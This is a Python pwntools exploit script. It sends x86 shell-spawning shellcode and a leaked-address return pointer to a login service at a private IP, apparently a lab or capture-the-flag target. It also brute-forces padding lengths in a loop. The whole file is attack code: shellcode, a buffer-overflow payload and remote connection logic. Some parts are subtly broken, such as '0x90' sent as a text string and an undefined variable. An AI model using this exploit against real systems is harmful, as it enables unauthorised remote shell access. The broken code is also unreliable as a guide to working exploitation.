exploit_sampleak.py

#!/usr/bin/python

import sys
from pwn import *
import time
shell_code = """\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x64\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"""
shell_code_2 = """\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"""

if len(sys.argv) > 1:
    conn = remote('172.31.29.2', 10003)
    payload = '0x90' * int(sys.argv[1])
    id_x = conn.recvuntil(')')
    id_x = id_x[:-2]
    id_y = int(id_x[-9:]) - 0x40
    id_x = conn.recv(timeout=5)
    conn.send('R\n')
    id_x = conn.recv(timeout=4)
    conn.send('98528 '+shell_code_2 + payload + p32(id_y))
    id_x = conn.recvuntil('Illegal login and password!', timeout=20)
    exit(1)

for i in range(1,15):
    conn = remote('172.31.29.2', 10003)
    payload = '0x90'*i + 'valuevalue'
    payload2 = '0x90'*24 + 'valuevalue'
    id_x = conn.recvuntil(')')
    id_x = id_x[:-2]
    id_y = int(id_x[-9:])
    id_z = y -0x90
    id_x = conn.recv()
    conn.send('R\n')
    conn.recv(timeout=3)
    conn.send('98528 ' + shell_code + payload + p32(id_z) )
    id_x = conn.recvuntil('Error',timeout=10)
    conn.close()
    time.sleep(6)